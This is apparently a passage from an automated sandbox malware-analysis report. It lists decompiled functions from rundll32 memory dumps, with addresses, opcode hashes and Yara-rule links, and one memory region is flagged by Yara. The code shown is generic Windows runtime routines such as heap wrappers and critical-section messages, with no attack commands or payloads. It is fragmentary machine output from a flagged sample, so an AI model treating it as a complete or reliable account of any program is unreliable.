                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0441AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                                0x0441aab6
                                                                                                                0x0441aabb
                                                                                                                0x0446a442
                                                                                                                0x00000000
                                                                                                                0x0446a448
                                                                                                                0x0446a454
                                                                                                                0x0446a454
                                                                                                                0x0441aac1
                                                                                                                0x0441aac1
                                                                                                                0x0441aac6
                                                                                                                0x0441aac6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                • Instruction ID: 68e4a2742c9589516036e2508d961c855ac756a69327179d9394e62d632b43ef
                                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                • Instruction Fuzzy Hash: 13D0E935352E80CFDB16CF1DC955B1673A4BB45B84FC50491E901DBB65E62CE944CA00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0448A537 Relevance: .0, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0448A537(intOrPtr _a4, intOrPtr _a8) {

				return L04428E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                0x0448a553

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                • Instruction ID: 795c56286580e2735fc1e7d37d68a375d1dc4a087e4e03104a0cea5af82da09f
                                                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                • Instruction Fuzzy Hash: 17C01232080248BBDB126E82CD00F0A7B2AEB94B60F008015BA080B5618632E970EA84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440DB40 Relevance: .0, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04424620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                0x0440db4d
                                                                                                                0x0440db54
                                                                                                                0x0440db5f
                                                                                                                0x0440db56
                                                                                                                0x0440db56
                                                                                                                0x0440db5c
                                                                                                                0x0440db5c

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                • Instruction ID: 5db3cbaddea3c1738632f9246a155997e12d46dfec80b1b8c1e62f923369d271
                                                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                • Instruction Fuzzy Hash: CEC08C70280A00AAEF226F20CE01B0136A0BB00B05F8400A16300DA4F4DB7CE911EA00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A58D6F Relevance: .0, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a7dcdfe47b6fbe2b15ec6a319b05f15d9ac52c27adf0fa78ecf0b5a503a4d1e
                                                                                                                • Instruction ID: ac9e4dd1232607a8b6b11ae2df678e8dc557cafcb56cd0f7f40c8a1d1a0c2000
                                                                                                                • Opcode Fuzzy Hash: 9a7dcdfe47b6fbe2b15ec6a319b05f15d9ac52c27adf0fa78ecf0b5a503a4d1e
                                                                                                                • Instruction Fuzzy Hash: 2BA00127F860180189245C8E78811BDE364E287476EA036A7EE4CF35509902C42945DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440AD30 Relevance: .0, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440AD30(intOrPtr _a4) {

				return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                0x0440ad49

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                • Instruction ID: 7b2f81c7f2586ebce822b9cb1a8dc8dc16248143dcb51a78b9d9494d5daf48f9
                                                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                • Instruction Fuzzy Hash: 24C08C32080248BBCB126A46CE00F017B29E7A0B60F000021B6040A6628972F860D588
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044336CC Relevance: .0, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044336CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                0x044336d2
                                                                                                                0x044336e8
                                                                                                                0x044336d4
                                                                                                                0x044336e5
                                                                                                                0x044336e5

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                • Instruction ID: db2a43763c081aa8cb42406c6d46891f23145300c5eb81576798b4b7190e9599
                                                                                                                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                • Instruction Fuzzy Hash: 98C02B70150440FFEF255F30CF00F197254F700E22FA403587220499F0D92CBC00D900
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044176E2 Relevance: .0, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044176E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                                0x044176e4
                                                                                                                0x00000000
                                                                                                                0x044176f8
                                                                                                                0x044176fd

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                • Instruction ID: 3a643733df3c33b5fb32406055cd34c0fdd0b03f97afc5f24be0f39150746cd7
                                                                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                • Instruction Fuzzy Hash: 0BC08C701411805AEF2A6B08CE30B223650AB28718F88019DAA11096B2C3A8B842C208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04423A1C Relevance: .0, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04423A1C(intOrPtr _a4) {
				void* _t5;

				return L04424620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                0x04423a35

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                • Instruction ID: 5d528657dc836dd7df87bb779c7bcb6b4e01ad04ea8caeee2322434b1f6c3749
                                                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                • Instruction Fuzzy Hash: 1FC08C32080248BBCB12AE42DD00F017B29E790B60F000021B6040A9618936ED60D988
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04427D50 Relevance: .0, Instructions: 7COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04427D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                0x04427d56
                                                                                                                0x04427d5b
                                                                                                                0x04427d60
                                                                                                                0x04427d5d
                                                                                                                0x04427d5d
                                                                                                                0x04427d5d

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                • Instruction ID: 120990c3046af5d77aa0d9fa975c76015073eec8c34a282ed7b7f1805fd15348
                                                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                • Instruction Fuzzy Hash: E6B092343119408FCF16DF28C180B1633E4BB44A80B8400D1E400CBA20D229E8008900
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04432ACB Relevance: .0, Instructions: 5COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04432ACB() {
				void* _t5;

				return E0441EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                                0x04432adc

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                • Instruction ID: 392c5af3fe40ae80dcd8e358a2274d0536b257be961c7fc7b6f3ccbf29fd9887
                                                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                • Instruction Fuzzy Hash: AEB01236C10440CFCF02EF40C610F197331FB00750F154495940127971C228BC01CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0449FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0449FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0444CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04495720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04495720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                0x0449fdda
                                                                                                                0x0449fde2
                                                                                                                0x0449fde5
                                                                                                                0x0449fdec
                                                                                                                0x0449fdfa
                                                                                                                0x0449fdff
                                                                                                                0x0449fe0a
                                                                                                                0x0449fe0f
                                                                                                                0x0449fe17
                                                                                                                0x0449fe1e
                                                                                                                0x0449fe19
                                                                                                                0x0449fe19
                                                                                                                0x0449fe19
                                                                                                                0x0449fe20
                                                                                                                0x0449fe21
                                                                                                                0x0449fe22
                                                                                                                0x0449fe25
                                                                                                                0x0449fe40

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0449FDFA
                                                                                                                Strings
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0449FE01
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0449FE2B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: d622c61d7082250b4dc6d7fd15aaab4b2071c378bf4432aa995644f003ead17f
                                                                                                                • Instruction ID: 15456363a7721e8c6f57996c31936206f6a3b515d2f86223c3f6c068116ddb40
                                                                                                                • Opcode Fuzzy Hash: d622c61d7082250b4dc6d7fd15aaab4b2071c378bf4432aa995644f003ead17f
                                                                                                                • Instruction Fuzzy Hash: FAF0C832240101BBFE211A46DC05E237F9ADB44730F250256F614555D1EA62BD2096A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%